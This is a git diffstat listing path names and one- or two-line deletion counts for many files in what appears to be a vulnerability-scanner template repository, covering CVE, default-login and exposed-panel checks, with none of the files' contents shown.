http/cves/2022/CVE-2022-23131.yaml | 2 -- http/cves/2022/CVE-2022-23134.yaml | 2 -- http/cves/2022/CVE-2022-2314.yaml | 2 -- http/cves/2022/CVE-2022-23178.yaml | 2 -- http/cves/2022/CVE-2022-23347.yaml | 2 -- http/cves/2022/CVE-2022-23348.yaml | 2 -- http/cves/2022/CVE-2022-2373.yaml | 2 -- http/cves/2022/CVE-2022-2376.yaml | 2 -- http/cves/2022/CVE-2022-23779.yaml | 2 -- http/cves/2022/CVE-2022-2379.yaml | 2 -- http/cves/2022/CVE-2022-23808.yaml | 1 - http/cves/2022/CVE-2022-2383.yaml | 2 -- http/cves/2022/CVE-2022-23854.yaml | 2 -- http/cves/2022/CVE-2022-23881.yaml | 2 -- http/cves/2022/CVE-2022-23898.yaml | 2 -- http/cves/2022/CVE-2022-23944.yaml | 2 -- http/cves/2022/CVE-2022-24112.yaml | 2 -- http/cves/2022/CVE-2022-24124.yaml | 2 -- http/cves/2022/CVE-2022-24129.yaml | 2 -- http/cves/2022/CVE-2022-24181.yaml | 2 -- http/cves/2022/CVE-2022-24260.yaml | 2 -- http/cves/2022/CVE-2022-24288.yaml | 2 -- http/cves/2022/CVE-2022-2462.yaml | 2 -- http/cves/2022/CVE-2022-2467.yaml | 2 -- http/cves/2022/CVE-2022-24681.yaml | 2 -- http/cves/2022/CVE-2022-24816.yaml | 2 -- http/cves/2022/CVE-2022-24856.yaml | 2 -- http/cves/2022/CVE-2022-2486.yaml | 2 -- http/cves/2022/CVE-2022-2487.yaml | 2 -- http/cves/2022/CVE-2022-2488.yaml | 2 -- http/cves/2022/CVE-2022-24899.yaml | 2 -- http/cves/2022/CVE-2022-24900.yaml | 2 -- http/cves/2022/CVE-2022-24990.yaml | 2 -- http/cves/2022/CVE-2022-25082.yaml | 2 -- http/cves/2022/CVE-2022-25125.yaml | 2 -- http/cves/2022/CVE-2022-25216.yaml | 2 -- http/cves/2022/CVE-2022-25323.yaml | 2 -- http/cves/2022/CVE-2022-25356.yaml | 2 -- http/cves/2022/CVE-2022-25369.yaml | 2 -- http/cves/2022/CVE-2022-2544.yaml | 2 -- http/cves/2022/CVE-2022-2546.yaml | 2 -- http/cves/2022/CVE-2022-2551.yaml | 2 -- http/cves/2022/CVE-2022-2599.yaml | 2 -- http/cves/2022/CVE-2022-26134.yaml | 2 -- http/cves/2022/CVE-2022-26138.yaml | 2 -- http/cves/2022/CVE-2022-26148.yaml | 2 -- http/cves/2022/CVE-2022-26159.yaml | 2 -- http/cves/2022/CVE-2022-26233.yaml | 2 -- http/cves/2022/CVE-2022-26263.yaml | 2 -- http/cves/2022/CVE-2022-2627.yaml | 2 -- http/cves/2022/CVE-2022-2633.yaml | 2 -- http/cves/2022/CVE-2022-26352.yaml | 2 -- http/cves/2022/CVE-2022-26564.yaml | 2 -- http/cves/2022/CVE-2022-26960.yaml | 2 -- http/cves/2022/CVE-2022-2756.yaml | 2 -- http/cves/2022/CVE-2022-27593.yaml | 2 -- http/cves/2022/CVE-2022-27849.yaml | 2 -- http/cves/2022/CVE-2022-27927.yaml | 2 -- http/cves/2022/CVE-2022-28079.yaml | 2 -- http/cves/2022/CVE-2022-28080.yaml | 2 -- http/cves/2022/CVE-2022-28117.yaml | 2 -- http/cves/2022/CVE-2022-28219.yaml | 2 -- http/cves/2022/CVE-2022-28290.yaml | 2 -- http/cves/2022/CVE-2022-28363.yaml | 2 -- http/cves/2022/CVE-2022-28365.yaml | 2 -- http/cves/2022/CVE-2022-2863.yaml | 2 -- http/cves/2022/CVE-2022-28923.yaml | 2 -- http/cves/2022/CVE-2022-28955.yaml | 2 -- http/cves/2022/CVE-2022-29004.yaml | 2 -- http/cves/2022/CVE-2022-29005.yaml | 2 -- http/cves/2022/CVE-2022-29006.yaml | 2 -- http/cves/2022/CVE-2022-29007.yaml | 2 -- http/cves/2022/CVE-2022-29009.yaml | 2 -- http/cves/2022/CVE-2022-29014.yaml | 2 -- http/cves/2022/CVE-2022-29078.yaml | 2 -- http/cves/2022/CVE-2022-29272.yaml | 2 -- http/cves/2022/CVE-2022-29298.yaml | 2 -- http/cves/2022/CVE-2022-29299.yaml | 2 -- http/cves/2022/CVE-2022-29301.yaml | 2 -- http/cves/2022/CVE-2022-29303.yaml | 2 -- http/cves/2022/CVE-2022-29349.yaml | 2 -- http/cves/2022/CVE-2022-29383.yaml | 2 -- http/cves/2022/CVE-2022-29455.yaml | 2 -- http/cves/2022/CVE-2022-29464.yaml | 2 -- http/cves/2022/CVE-2022-29548.yaml | 2 -- http/cves/2022/CVE-2022-29775.yaml | 2 -- http/cves/2022/CVE-2022-30073.yaml | 2 -- http/cves/2022/CVE-2022-30489.yaml | 2 -- http/cves/2022/CVE-2022-30512.yaml | 2 -- http/cves/2022/CVE-2022-30513.yaml | 2 -- http/cves/2022/CVE-2022-30514.yaml | 2 -- http/cves/2022/CVE-2022-30525.yaml | 2 -- http/cves/2022/CVE-2022-30776.yaml | 2 -- http/cves/2022/CVE-2022-30777.yaml | 2 -- http/cves/2022/CVE-2022-31126.yaml | 2 -- http/cves/2022/CVE-2022-31268.yaml | 2 -- http/cves/2022/CVE-2022-31269.yaml | 2 -- http/cves/2022/CVE-2022-31299.yaml | 2 -- http/cves/2022/CVE-2022-31373.yaml | 2 -- http/cves/2022/CVE-2022-31474.yaml | 2 -- http/cves/2022/CVE-2022-31499.yaml | 2 -- http/cves/2022/CVE-2022-31656.yaml | 2 -- http/cves/2022/CVE-2022-31798.yaml | 2 -- http/cves/2022/CVE-2022-31814.yaml | 2 -- http/cves/2022/CVE-2022-31845.yaml | 2 -- http/cves/2022/CVE-2022-31846.yaml | 2 -- http/cves/2022/CVE-2022-31847.yaml | 2 -- http/cves/2022/CVE-2022-31854.yaml | 2 -- http/cves/2022/CVE-2022-32007.yaml | 2 -- http/cves/2022/CVE-2022-32015.yaml | 2 -- http/cves/2022/CVE-2022-32018.yaml | 2 -- http/cves/2022/CVE-2022-32022.yaml | 2 -- http/cves/2022/CVE-2022-32024.yaml | 2 -- http/cves/2022/CVE-2022-32025.yaml | 2 -- http/cves/2022/CVE-2022-32026.yaml | 2 -- http/cves/2022/CVE-2022-32028.yaml | 2 -- http/cves/2022/CVE-2022-32094.yaml | 2 -- http/cves/2022/CVE-2022-32195.yaml | 2 -- http/cves/2022/CVE-2022-32409.yaml | 2 -- http/cves/2022/CVE-2022-32429.yaml | 2 -- http/cves/2022/CVE-2022-32444.yaml | 2 -- http/cves/2022/CVE-2022-32770.yaml | 2 -- http/cves/2022/CVE-2022-32771.yaml | 2 -- http/cves/2022/CVE-2022-32772.yaml | 2 -- http/cves/2022/CVE-2022-33119.yaml | 2 -- http/cves/2022/CVE-2022-33174.yaml | 2 -- http/cves/2022/CVE-2022-33891.yaml | 2 -- http/cves/2022/CVE-2022-33901.yaml | 2 -- http/cves/2022/CVE-2022-33965.yaml | 2 -- http/cves/2022/CVE-2022-34045.yaml | 2 -- http/cves/2022/CVE-2022-34046.yaml | 2 -- http/cves/2022/CVE-2022-34047.yaml | 2 -- http/cves/2022/CVE-2022-34048.yaml | 2 -- http/cves/2022/CVE-2022-34049.yaml | 2 -- http/cves/2022/CVE-2022-34121.yaml | 2 -- http/cves/2022/CVE-2022-34328.yaml | 2 -- http/cves/2022/CVE-2022-34576.yaml | 2 -- http/cves/2022/CVE-2022-34590.yaml | 2 -- http/cves/2022/CVE-2022-34753.yaml | 2 -- http/cves/2022/CVE-2022-3484.yaml | 2 -- http/cves/2022/CVE-2022-3506.yaml | 2 -- http/cves/2022/CVE-2022-35151.yaml | 2 -- http/cves/2022/CVE-2022-35405.yaml | 2 -- http/cves/2022/CVE-2022-35413.yaml | 2 -- http/cves/2022/CVE-2022-35416.yaml | 2 -- http/cves/2022/CVE-2022-35493.yaml | 2 -- http/cves/2022/CVE-2022-3578.yaml | 2 -- http/cves/2022/CVE-2022-35914.yaml | 2 -- http/cves/2022/CVE-2022-36446.yaml | 2 -- http/cves/2022/CVE-2022-36537.yaml | 2 -- http/cves/2022/CVE-2022-36642.yaml | 2 -- http/cves/2022/CVE-2022-36804.yaml | 2 -- http/cves/2022/CVE-2022-36883.yaml | 2 -- http/cves/2022/CVE-2022-37042.yaml | 1 - http/cves/2022/CVE-2022-37153.yaml | 2 -- http/cves/2022/CVE-2022-37299.yaml | 2 -- http/cves/2022/CVE-2022-3768.yaml | 2 -- http/cves/2022/CVE-2022-3800.yaml | 2 -- http/cves/2022/CVE-2022-38463.yaml | 2 -- http/cves/2022/CVE-2022-38553.yaml | 2 -- http/cves/2022/CVE-2022-38637.yaml | 2 -- http/cves/2022/CVE-2022-38794.yaml | 2 -- http/cves/2022/CVE-2022-38817.yaml | 2 -- http/cves/2022/CVE-2022-38870.yaml | 2 -- http/cves/2022/CVE-2022-3908.yaml | 2 -- http/cves/2022/CVE-2022-39195.yaml | 2 -- http/cves/2022/CVE-2022-3933.yaml | 2 -- http/cves/2022/CVE-2022-3934.yaml | 2 -- http/cves/2022/CVE-2022-3982.yaml | 2 -- http/cves/2022/CVE-2022-39952.yaml | 2 -- http/cves/2022/CVE-2022-39960.yaml | 2 -- http/cves/2022/CVE-2022-40359.yaml | 2 -- http/cves/2022/CVE-2022-4050.yaml | 2 -- http/cves/2022/CVE-2022-4060.yaml | 2 -- http/cves/2022/CVE-2022-4063.yaml | 2 -- http/cves/2022/CVE-2022-40684.yaml | 2 -- http/cves/2022/CVE-2022-40734.yaml | 2 -- http/cves/2022/CVE-2022-40879.yaml | 2 -- http/cves/2022/CVE-2022-40881.yaml | 2 -- http/cves/2022/CVE-2022-4117.yaml | 2 -- http/cves/2022/CVE-2022-4140.yaml | 2 -- http/cves/2022/CVE-2022-41473.yaml | 2 -- http/cves/2022/CVE-2022-41840.yaml | 2 -- http/cves/2022/CVE-2022-42233.yaml | 2 -- http/cves/2022/CVE-2022-4260.yaml | 2 -- http/cves/2022/CVE-2022-42746.yaml | 2 -- http/cves/2022/CVE-2022-42747.yaml | 2 -- http/cves/2022/CVE-2022-42748.yaml | 2 -- http/cves/2022/CVE-2022-42749.yaml | 2 -- http/cves/2022/CVE-2022-4301.yaml | 2 -- http/cves/2022/CVE-2022-43014.yaml | 2 -- http/cves/2022/CVE-2022-43015.yaml | 2 -- http/cves/2022/CVE-2022-43016.yaml | 2 -- http/cves/2022/CVE-2022-43017.yaml | 2 -- http/cves/2022/CVE-2022-43018.yaml | 2 -- http/cves/2022/CVE-2022-4306.yaml | 2 -- http/cves/2022/CVE-2022-43140.yaml | 2 -- http/cves/2022/CVE-2022-4320.yaml | 2 -- http/cves/2022/CVE-2022-4325.yaml | 2 -- http/cves/2022/CVE-2022-43769.yaml | 2 -- http/cves/2022/CVE-2022-4447.yaml | 2 -- http/cves/2022/CVE-2022-44877.yaml | 2 -- http/cves/2022/CVE-2022-45362.yaml | 2 -- http/cves/2022/CVE-2022-45805.yaml | 2 -- http/cves/2022/CVE-2022-45835.yaml | 2 -- http/cves/2022/CVE-2022-45917.yaml | 2 -- http/cves/2022/CVE-2022-45933.yaml | 2 -- http/cves/2022/CVE-2022-46169.yaml | 2 -- http/cves/2022/CVE-2022-46381.yaml | 2 -- http/cves/2022/CVE-2022-46888.yaml | 2 -- http/cves/2022/CVE-2022-47002.yaml | 2 -- http/cves/2022/CVE-2022-47003.yaml | 2 -- http/cves/2022/CVE-2022-47945.yaml | 2 -- http/cves/2022/CVE-2022-47966.yaml | 2 -- http/cves/2022/CVE-2022-47986.yaml | 2 -- http/cves/2022/CVE-2022-48012.yaml | 2 -- http/cves/2022/CVE-2022-48165.yaml | 2 -- http/cves/2022/CVE-2022-4897.yaml | 2 -- http/cves/2023/CVE-2023-0236.yaml | 2 -- http/cves/2023/CVE-2023-0261.yaml | 2 -- http/cves/2023/CVE-2023-0552.yaml | 2 -- http/cves/2023/CVE-2023-0669.yaml | 2 -- http/cves/2023/CVE-2023-0942.yaml | 2 -- http/cves/2023/CVE-2023-0968.yaml | 2 -- http/cves/2023/CVE-2023-1080.yaml | 2 -- http/cves/2023/CVE-2023-1177.yaml | 2 -- http/cves/2023/CVE-2023-23488.yaml | 2 -- http/cves/2023/CVE-2023-23489.yaml | 2 -- http/cves/2023/CVE-2023-23492.yaml | 2 -- http/cves/2023/CVE-2023-23752.yaml | 2 -- http/cves/2023/CVE-2023-24044.yaml | 2 -- http/cves/2023/CVE-2023-24278.yaml | 2 -- http/cves/2023/CVE-2023-24322.yaml | 2 -- http/cves/2023/CVE-2023-24367.yaml | 2 -- http/cves/2023/CVE-2023-24657.yaml | 2 -- http/cves/2023/CVE-2023-24733.yaml | 2 -- http/cves/2023/CVE-2023-24735.yaml | 2 -- http/cves/2023/CVE-2023-24737.yaml | 2 -- http/cves/2023/CVE-2023-26255.yaml | 2 -- http/cves/2023/CVE-2023-26256.yaml | 2 -- http/cves/2023/CVE-2023-27159.yaml | 2 -- http/cves/2023/CVE-2023-27292.yaml | 2 -- http/cves/2023/CVE-2023-27587.yaml | 2 -- http/cves/2023/CVE-2023-28343.yaml | 2 -- http/cves/2023/CVE-2023-28432.yaml | 2 -- http/default-logins/3com/3com-nj2000-default-login.yaml | 2 -- http/default-logins/UCMDB/ucmdb-default-login.yaml | 2 -- http/default-logins/abb/cs141-default-login.yaml | 2 -- http/default-logins/activemq/activemq-default-login.yaml | 2 -- http/default-logins/adminer-default-login.yaml | 2 -- http/default-logins/aem/aem-default-login.yaml | 2 -- http/default-logins/aem/aem-felix-console.yaml | 2 -- http/default-logins/alibaba/canal-default-login.yaml | 2 -- http/default-logins/alphaweb/alphaweb-default-login.yaml | 2 -- http/default-logins/ambari/ambari-default-login.yaml | 2 -- http/default-logins/apache/airflow-default-login.yaml | 2 -- http/default-logins/apache/apisix-default-login.yaml | 2 -- http/default-logins/apache/dolphinscheduler-default-login.yaml | 2 -- http/default-logins/apache/dubbo-admin-default-login.yaml | 2 -- http/default-logins/apache/kafka-center-default-login.yaml | 2 -- http/default-logins/apache/karaf-default-login.yaml | 2 -- http/default-logins/apache/ranger-default-login.yaml | 2 -- http/default-logins/apache/tomcat-default-login.yaml | 2 -- http/default-logins/apache/tomcat-examples-login.yaml | 2 -- http/default-logins/apollo/apollo-default-login.yaml | 2 -- http/default-logins/arl/arl-default-login.yaml | 2 -- http/default-logins/audiocodes/audiocodes-default-login.yaml | 2 -- http/default-logins/azkaban/azkaban-default-login.yaml | 2 -- http/default-logins/chinaunicom/chinaunicom-default-login.yaml | 2 -- http/default-logins/cobbler/cobbler-default-login.yaml | 2 -- http/default-logins/cobbler/hue-default-credential.yaml | 2 -- .../default-logins/datahub/datahub-metadata-default-login.yaml | 2 -- http/default-logins/dataiku/dataiku-default-login.yaml | 2 -- http/default-logins/dell/dell-idrac-default-login.yaml | 2 -- http/default-logins/dell/dell-idrac9-default-login.yaml | 2 -- http/default-logins/dell/emcecom-default-login.yaml | 2 -- .../digitalrebar/digitalrebar-default-login.yaml | 2 -- http/default-logins/druid/druid-default-login.yaml | 2 -- http/default-logins/dvwa/dvwa-default-login.yaml | 2 -- http/default-logins/empire/empirec2-default-login.yaml | 2 -- http/default-logins/emqx/emqx-default-login.yaml | 2 -- http/default-logins/exacqvision/exacqvision-default-login.yaml | 2 -- http/default-logins/flir/flir-default-login.yaml | 2 -- http/default-logins/frps/frp-default-login.yaml | 2 -- http/default-logins/fuelcms/fuelcms-default-login.yaml | 2 -- http/default-logins/geoserver/geoserver-default-login.yaml | 2 -- http/default-logins/gitlab/gitlab-weak-login.yaml | 2 -- http/default-logins/glpi/glpi-default-login.yaml | 2 -- http/default-logins/google/google-earth-dlogin.yaml | 2 -- http/default-logins/gophish/gophish-default-login.yaml | 2 -- http/default-logins/grafana/grafana-default-login.yaml | 2 -- http/default-logins/guacamole/guacamole-default-login.yaml | 2 -- http/default-logins/hongdian/hongdian-default-login.yaml | 2 -- http/default-logins/hortonworks/smartsense-default-login.yaml | 2 -- http/default-logins/hp/hp-switch-default-login.yaml | 2 -- .../huawei/huawei-HG532e-default-router-login.yaml | 2 -- http/default-logins/hybris/hybris-default-login.yaml | 2 -- http/default-logins/ibm/ibm-mqseries-default-login.yaml | 2 -- http/default-logins/ibm/ibm-storage-default-credential.yaml | 2 -- .../default-logins/idemia/idemia-biometrics-default-login.yaml | 2 -- http/default-logins/iptime/iptime-default-login.yaml | 2 -- http/default-logins/jboss/jboss-jbpm-default-login.yaml | 2 -- http/default-logins/jboss/jmx-default-login.yaml | 2 -- http/default-logins/jenkins/jenkins-default.yaml | 2 -- http/default-logins/jinher/jinher-oa-default-login.yaml | 2 -- http/default-logins/jupyterhub/jupyterhub-default-login.yaml | 2 -- http/default-logins/kanboard-default-login.yaml | 2 -- http/default-logins/kettle/kettle-default-login.yaml | 2 -- http/default-logins/lutron/lutron-default-login.yaml | 2 -- http/default-logins/magnolia-default-login.yaml | 2 -- http/default-logins/mantisbt/mantisbt-default-credential.yaml | 2 -- http/default-logins/mobotix/mobotix-default-login.yaml | 2 -- http/default-logins/mofi/mofi4500-default-login.yaml | 2 -- http/default-logins/nagios/nagios-default-login.yaml | 2 -- http/default-logins/nagios/nagiosxi-default-login.yaml | 2 -- http/default-logins/netsus/netsus-default-login.yaml | 2 -- http/default-logins/nexus/nexus-default-login.yaml | 2 -- http/default-logins/nps/nps-default-login.yaml | 2 -- http/default-logins/nsicg/nsicg-default-login.yaml | 2 -- http/default-logins/octobercms/octobercms-default-login.yaml | 2 -- http/default-logins/ofbiz/ofbiz-default-login.yaml | 2 -- http/default-logins/openemr/openemr-default-login.yaml | 2 -- http/default-logins/openwrt/openwrt-default-login.yaml | 2 -- .../oracle/businessintelligence-default-login.yaml | 2 -- http/default-logins/oracle/peoplesoft-default-login.yaml | 2 -- .../others/inspur-clusterengine-default-login.yaml | 2 -- http/default-logins/others/kingsoft-v8-default-login.yaml | 2 -- http/default-logins/others/opencats-default-login.yaml | 2 -- http/default-logins/others/panabit-ixcache-default-login.yaml | 2 -- http/default-logins/others/secnet-ac-default-login.yaml | 2 -- http/default-logins/others/telecom-gateway-default-login.yaml | 2 -- http/default-logins/paloalto/panos-default-login.yaml | 2 -- http/default-logins/panabit/panabit-default-login.yaml | 2 -- http/default-logins/pentaho/pentaho-default-login.yaml | 2 -- http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml | 2 -- http/default-logins/prtg/prtg-default-login.yaml | 2 -- http/default-logins/rabbitmq/rabbitmq-default-login.yaml | 2 -- http/default-logins/rainloop/rainloop-default-login.yaml | 2 -- http/default-logins/rancher/rancher-default-login.yaml | 2 -- http/default-logins/ricoh/ricoh-weak-password.yaml | 2 -- http/default-logins/rockmongo/rockmongo-default-login.yaml | 2 -- http/default-logins/rseenet/rseenet-default-login.yaml | 2 -- http/default-logins/ruckus/ruckus-wireless-default-login.yaml | 2 -- http/default-logins/samsung/samsung-printer-default-login.yaml | 2 -- http/default-logins/samsung/samsung-wlan-default-login.yaml | 2 -- http/default-logins/seeddms/seeddms-default-login.yaml | 2 -- http/default-logins/sequoiadb/sequoiadb-default-login.yaml | 2 -- http/default-logins/showdoc/showdoc-default-login.yaml | 2 -- http/default-logins/solarwinds/solarwinds-default-login.yaml | 2 -- http/default-logins/spectracom/spectracom-default-login.yaml | 2 -- http/default-logins/stackstorm/stackstorm-default-login.yaml | 2 -- http/default-logins/steve/steve-default-login.yaml | 2 -- http/default-logins/supermicro/supermicro-default-login.yaml | 2 -- http/default-logins/szhe/szhe-default-login.yaml | 2 -- http/default-logins/tiny-file-manager-default-login.yaml | 2 -- http/default-logins/tooljet/tooljet-default-login.yaml | 2 -- http/default-logins/trassir/trassir-default-login.yaml | 2 -- http/default-logins/versa/versa-default-login.yaml | 2 -- http/default-logins/versa/versa-flexvnf-default-login.yaml | 2 -- http/default-logins/vidyo/vidyo-default-login.yaml | 2 -- http/default-logins/viewpoint/trilithic-viewpoint-login.yaml | 2 -- http/default-logins/visionhub/visionhub-default-login.yaml | 2 -- http/default-logins/weblogic/weblogic-weak-login.yaml | 2 -- http/default-logins/wifisky/wifisky-default-login.yaml | 2 -- http/default-logins/wildfly/wildfly-default-login.yaml | 2 -- http/default-logins/wso2/wso2-default-login.yaml | 2 -- http/default-logins/xerox/xerox7-default-login.yaml | 2 -- http/default-logins/xnat/xnat-default-login.yaml | 2 -- http/default-logins/xui-weak-login.yaml | 2 -- http/default-logins/xxljob/xxljob-default-login.yaml | 2 -- http/default-logins/zabbix/zabbix-default-login.yaml | 2 -- http/default-logins/zmanda/zmanda-default-login.yaml | 2 -- http/exposed-panels/3cx-phone-management-panel.yaml | 2 -- http/exposed-panels/3cx-phone-webclient-management-panel.yaml | 2 -- http/exposed-panels/3g-wireless-gateway.yaml | 2 -- http/exposed-panels/acemanager-login.yaml | 2 -- http/exposed-panels/achecker-panel.yaml | 2 -- http/exposed-panels/acrolinx-dashboard.yaml | 2 -- http/exposed-panels/active-admin-exposure.yaml | 2 -- http/exposed-panels/activemq-panel.yaml | 2 -- http/exposed-panels/acunetix-login.yaml | 2 -- http/exposed-panels/acunetix-panel.yaml | 2 -- http/exposed-panels/adiscon-loganalyzer.yaml | 2 -- http/exposed-panels/adminer-panel-detect.yaml | 2 -- http/exposed-panels/adminer-panel.yaml | 2 -- http/exposed-panels/adminset-panel.yaml | 2 -- http/exposed-panels/adobe/adobe-component-login.yaml | 2 -- http/exposed-panels/adobe/adobe-connect-central-login.yaml | 2 -- http/exposed-panels/adobe/adobe-experience-manager-login.yaml | 2 -- http/exposed-panels/adobe/adobe-media-server.yaml | 2 -- http/exposed-panels/adobe/aem-crx-package-manager.yaml | 2 -- http/exposed-panels/adobe/aem-sling-login.yaml | 2 -- http/exposed-panels/advance-setup.yaml | 2 -- http/exposed-panels/aerohive-netconfig-ui.yaml | 2 -- http/exposed-panels/aircube-dashboard-panel.yaml | 2 -- http/exposed-panels/aircube-login.yaml | 2 -- http/exposed-panels/airflow-panel.yaml | 2 -- http/exposed-panels/airnotifier-panel.yaml | 2 -- http/exposed-panels/akamai-cloudtest.yaml | 2 -- http/exposed-panels/alfresco-detect.yaml | 2 -- http/exposed-panels/alienvault-usm.yaml | 2 -- http/exposed-panels/allied-telesis-exposure.yaml | 2 -- http/exposed-panels/ambari-exposure.yaml | 2 -- http/exposed-panels/amcrest-login.yaml | 2 -- http/exposed-panels/ametys-admin-login.yaml | 2 -- http/exposed-panels/amp-application-panel.yaml | 2 -- http/exposed-panels/ampache-panel.yaml | 2 -- http/exposed-panels/ampps-admin-panel.yaml | 2 -- http/exposed-panels/ampps-panel.yaml | 2 -- http/exposed-panels/ansible-semaphore-panel.yaml | 2 -- http/exposed-panels/ansible-tower-exposure.yaml | 2 -- http/exposed-panels/apache-jmeter-dashboard.yaml | 2 -- http/exposed-panels/apache/apache-apisix-panel.yaml | 2 -- http/exposed-panels/apache/apache-mesos-panel.yaml | 2 -- http/exposed-panels/apache/public-tomcat-manager.yaml | 2 -- http/exposed-panels/apiman-panel.yaml | 2 -- http/exposed-panels/appsmith-web-login.yaml | 2 -- http/exposed-panels/appwrite-panel.yaml | 2 -- http/exposed-panels/aptus-panel.yaml | 2 -- http/exposed-panels/aqua-enterprise-panel.yaml | 2 -- http/exposed-panels/arcgis/arcgis-panel.yaml | 2 -- http/exposed-panels/arcgis/arcgis-rest-api.yaml | 2 -- http/exposed-panels/archibus-webcentral-panel.yaml | 2 -- http/exposed-panels/argocd-login.yaml | 2 -- http/exposed-panels/arris-modem-detect.yaml | 2 -- http/exposed-panels/aspect-control-panel.yaml | 2 -- http/exposed-panels/asus-router-panel.yaml | 2 -- http/exposed-panels/atlantis-detect.yaml | 2 -- http/exposed-panels/atvise-login.yaml | 2 -- http/exposed-panels/audiocodes-detect.yaml | 2 -- http/exposed-panels/avantfax-panel.yaml | 2 -- http/exposed-panels/avatier-password-management.yaml | 2 -- http/exposed-panels/avaya/avayaaura-cm-panel.yaml | 2 -- http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml | 2 -- http/exposed-panels/aviatrix-panel.yaml | 1 - http/exposed-panels/avigilon-panel.yaml | 2 -- http/exposed-panels/avtech-avn801-camera-panel.yaml | 2 -- http/exposed-panels/avtech-dvr-exposure.yaml | 2 -- http/exposed-panels/aws-opensearch-login.yaml | 2 -- http/exposed-panels/axel-webserver.yaml | 2 -- http/exposed-panels/axigen-webadmin.yaml | 2 -- http/exposed-panels/axigen-webmail.yaml | 2 -- http/exposed-panels/axway-securetransport-panel.yaml | 2 -- http/exposed-panels/axway-securetransport-webclient.yaml | 2 -- http/exposed-panels/azkaban-web-client.yaml | 2 -- http/exposed-panels/backpack/backpack-admin-panel.yaml | 2 -- http/exposed-panels/barracuda-panel.yaml | 2 -- http/exposed-panels/bazarr-login.yaml | 2 -- http/exposed-panels/bedita-panel.yaml | 2 -- http/exposed-panels/beego-admin-dashboard.yaml | 2 -- http/exposed-panels/beyondtrust-login-server.yaml | 2 -- http/exposed-panels/beyondtrust-panel.yaml | 2 -- http/exposed-panels/bigant-login-panel.yaml | 2 -- http/exposed-panels/bigbluebutton-login.yaml | 2 -- http/exposed-panels/bigfix-login.yaml | 2 -- http/exposed-panels/bigip-rest-panel.yaml | 2 -- http/exposed-panels/biotime-panel.yaml | 2 -- http/exposed-panels/bitdefender-gravityzone.yaml | 2 -- http/exposed-panels/bitrix-panel.yaml | 2 -- http/exposed-panels/black-duck-panel.yaml | 2 -- http/exposed-panels/blue-iris-login.yaml | 2 -- http/exposed-panels/bmc-panel-detect.yaml | 2 -- http/exposed-panels/bmc/bmc-discovery-panel.yaml | 2 -- http/exposed-panels/bolt-cms-panel.yaml | 2 -- http/exposed-panels/bomgar-login-panel.yaml | 2 -- http/exposed-panels/bookstack-panel.yaml | 2 -- http/exposed-panels/buddy-panel.yaml | 2 -- http/exposed-panels/buildbot-panel.yaml | 2 -- http/exposed-panels/cacti-panel.yaml | 2 -- http/exposed-panels/calendarix-panel.yaml | 2 -- http/exposed-panels/call-break-cms.yaml | 2 -- http/exposed-panels/camunda-login-panel.yaml | 2 -- http/exposed-panels/cas-login.yaml | 2 -- http/exposed-panels/casdoor-login.yaml | 2 -- http/exposed-panels/casemanager-panel.yaml | 2 -- http/exposed-panels/caton-network-manager-system.yaml | 2 -- http/exposed-panels/ccm-detect.yaml | 2 -- http/exposed-panels/centreon-panel.yaml | 2 -- http/exposed-panels/cerebro-panel.yaml | 2 -- http/exposed-panels/checkmk/checkmarx-panel.yaml | 2 -- http/exposed-panels/checkmk/checkmk-login.yaml | 2 -- http/exposed-panels/checkpoint-panel.yaml | 2 -- http/exposed-panels/checkpoint/ssl-network-extender.yaml | 2 -- http/exposed-panels/cisco/cisco-ace-device-manager.yaml | 2 -- http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml | 2 -- http/exposed-panels/cisco/cisco-asa-panel.yaml | 2 -- http/exposed-panels/cisco/cisco-edge-340.yaml | 2 -- http/exposed-panels/cisco/cisco-finesse-login.yaml | 2 -- http/exposed-panels/cisco/cisco-integrated-login.yaml | 2 -- http/exposed-panels/cisco/cisco-meraki-exposure.yaml | 2 -- http/exposed-panels/cisco/cisco-prime-infrastructure.yaml | 2 -- http/exposed-panels/cisco/cisco-sd-wan.yaml | 2 -- http/exposed-panels/cisco/cisco-secure-cn.yaml | 2 -- http/exposed-panels/cisco/cisco-secure-desktop.yaml | 2 -- http/exposed-panels/cisco/cisco-sendgrid.yaml | 2 -- http/exposed-panels/cisco/cisco-systems-login.yaml | 2 -- http/exposed-panels/cisco/cisco-telepresence.yaml | 2 -- http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml | 2 -- http/exposed-panels/cisco/cisco-vmanage-login.yaml | 2 -- http/exposed-panels/cisco/cisco-webvpn-detect.yaml | 2 -- http/exposed-panels/citrix-adc-gateway-detect.yaml | 2 -- http/exposed-panels/citrix-vpn-detect.yaml | 2 -- http/exposed-panels/claris-filemaker-webdirect.yaml | 2 -- http/exposed-panels/clave-login-panel.yaml | 2 -- http/exposed-panels/clearpass-policy-manager.yaml | 2 -- http/exposed-panels/cloudphysician-radar.yaml | 2 -- http/exposed-panels/cobbler-webgui.yaml | 2 -- http/exposed-panels/code-server-login.yaml | 2 -- http/exposed-panels/code42-panel.yaml | 2 -- http/exposed-panels/codemeter-webadmin-panel.yaml | 2 -- http/exposed-panels/cofense-vision-panel.yaml | 2 -- http/exposed-panels/coldfusion-administrator-login.yaml | 2 -- http/exposed-panels/compal-panel.yaml | 2 -- http/exposed-panels/completeview-web-panel.yaml | 2 -- http/exposed-panels/concourse-ci-panel.yaml | 2 -- http/exposed-panels/concrete5/concrete5-install.yaml | 2 -- http/exposed-panels/concrete5/concrete5-panel.yaml | 2 -- http/exposed-panels/connect-box-login.yaml | 2 -- http/exposed-panels/connectwise-backup-manager.yaml | 2 -- http/exposed-panels/contao-login-panel.yaml | 2 -- http/exposed-panels/content-central-login.yaml | 2 -- http/exposed-panels/contentkeeper-detect.yaml | 2 -- http/exposed-panels/corebos-panel.yaml | 2 -- http/exposed-panels/cortex-xsoar-login.yaml | 2 -- http/exposed-panels/couchdb-exposure.yaml | 2 -- http/exposed-panels/couchdb-fauxton.yaml | 2 -- http/exposed-panels/cpanel-api-codes.yaml | 2 -- http/exposed-panels/craftcms-admin-panel.yaml | 2 -- http/exposed-panels/creatio-login-panel.yaml | 2 -- http/exposed-panels/crush-ftp-login.yaml | 2 -- http/exposed-panels/crxde-lite.yaml | 2 -- http/exposed-panels/csod-panel.yaml | 2 -- http/exposed-panels/cudatel-panel.yaml | 2 -- http/exposed-panels/cvent-panel-detect.yaml | 2 -- http/exposed-panels/cwp-webpanel.yaml | 2 -- http/exposed-panels/cx-cloud-login.yaml | 2 -- 